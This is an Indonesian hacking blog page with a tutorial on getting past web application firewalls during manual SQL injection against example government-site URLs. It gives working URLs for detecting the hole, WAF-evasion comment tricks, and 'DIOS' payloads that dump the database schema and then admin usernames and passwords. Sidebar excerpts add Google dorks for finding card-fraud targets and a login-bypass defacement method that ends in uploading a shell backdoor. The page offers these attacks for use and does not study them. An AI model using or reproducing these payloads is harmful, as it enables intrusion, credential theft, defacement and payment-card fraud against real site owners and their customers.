Langsung ke konten utama

Tutorial Bypass Waf Sqli

Hallo gais ... pada tulisan singkat kali ini saya akan memberikan sedikit tutorial cara mengatasi 404 Forbiden dan error lainnya saat injet manual Sql Injection .. Tanpa basa basi lagi langsung saya saya berikan tutorial'nya.

1. Pertama kalian harus cari target vuln Sqli.
Contoh: http://target.go.id/berita.php?id=28 Cara mengecek apakah target Vuln Sqli adalah anda tinggal menambahkan petik atas pada akhir url.
Contoh: http://target.go.id/berita.php?id=28' dan jika blank atau terdapat error barti itu vuln sqli.

2. Lalu kalian masukkan perintah order by di belakang akhir url
Contoh: http://target.go.id/berita.php?id=28'+order+by+15--+- Jika Error Forbidden atau yang lainnya barti anda harus membypass'nya
/*50000...*/+/*50000...*/
atau bisa menggunakan
/*12345...*/+/*12345...*/

3. Lalu kalian masukkan perintah union select, Contoh:http://target.go.id/berita.php?id=-28'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+- Jika masih terdapat error Forbidden mari kita membypass'nya dengan perintah
/*!12345union*/+/*!12345select*/
Atau bisa dengan
/*!%55NiOn*/ /*!%53eLEct*/

4, Lalu kita langsung masukkan saja Perintah dios untuk menampilkan semua isi database target dengan cara mengubah angka togel yang muncul setelah kita union select tadi.
Contoh: Contoh:http://target.go.id/berita.php?id=-28'+union+select+1,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@) ,3,4,5,6,7,8,9,10,11,12,13,14,15--+-

Perintah DIOS: /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)

5. Setelah Database tampil, Lalu kita akan mencari username dan password dan kita akan Dump'nya dengan cara merubah perintah dios untuk menampilkan databse tadi dengan perintah Dump DIOS
Contoh: http://target.go.id/berita.php?id=-28'+union+select+1,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345admin_login*/)where@:=make_set(511,@,0x3c6c693e,/*!12345username*/,/*!12345password*/)),@) ,3,4,5,6,7,8,9,10,11,12,13,14,15--+-

Perintah: /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345admin_login*/)where@:=make_set(511,@,0x3c6c693e,/*!12345username*/,/*!12345password*/)),@)

Bagi Kalian yang belum paham dengan tutorial di atas, Silahkan bertanya lewat komentar.

Komentar

Posting Komentar

Postingan populer dari blog ini

Dork Carding 2019

Hallo gais, Setelah lama tidak membuat artikel kali ini saya akan berbagi dork carding CC 2019. Di bawah ini adalah dork'nya ... Langsung sedot saja ya gais .. inurl:”.php?cid=” intext:”shop” view_details.php?id= inurl:”.php?cid=” intext:”payment_option” inurl:”.php?cid=” intext:”delivery_address” Products.php?id= description.php?id= productlist.asp?catalogid= inurl:”.php?cid=” intext:”My_cart” inurl:”.php?cid=” intext:”Payment_Gateway” inurl:”.php?cid=” intext:”Transaction_succesfull” inurl:”.php?cid=” intext:”shoping” inurl:”.php?cid=” intext:”otp” inurl:”.php?cid=” intext:”verified" Your_account_details.php?id= inurl:”.php?cid=” intext:”Gateway” your_orders.php?ID= inurl:”.php?cid=” intext:”Payment_Successfull” inurl:”.php?cid=” intext:”Order_Recieved” productdesc.asp?catalogid= inurl:”.php?cid=” intext:”will_be_delivered” inurl:”.php?cid=” intext:”keep_shoping” inurl:”.php?cid=” intext:”Cashback” inurl:”.php?cid=” intext:”CVV” inurl:”.php?cid
Posting Komentar
Baca selengkapnya

Tutorial Deface Dengan Bypass Admin Login

Hai, Asalamuallaikum wr.wb, Kali ini saya akan memberikan tutorial deface dengan Bypass Admin login, Sama halnya dengan Sql Injection Bug ini memungkinkan attacker dapat Login sebagai admin dengan memasukkan beberapa perintah tertentu di dalam Form Login, Segala Tindakan yang tidak di inginkan bukan tanggung jawab penulis, Tutorial ini hanya sebagai pengetahuan saja .... 1. Google Dork. Langkah pertama yaitu dengan menggunakan Google Dork inurl:/ admin_login.php site: .com ( kembangin sendiri ) 2. Pilih salah satu website . Pilih salah satu website yang menurut anda vuln sehingga akan tampil form login admin. 3. Username dan Password. Kemudian isikan Username dan Password dengan '=''or' Jika berhasil nantinya kita akan di alihkan ke halaman Admin Dashboard sehingga anda bisa mencari bagian dari Form Upload untuk meng-Upload script deface atau Shell Backdoor kalian, dan jika gagal Cari target yang lain. Oke sekian tutorial sederhana dari saya, Asalamuall
1 komentar
Baca selengkapnya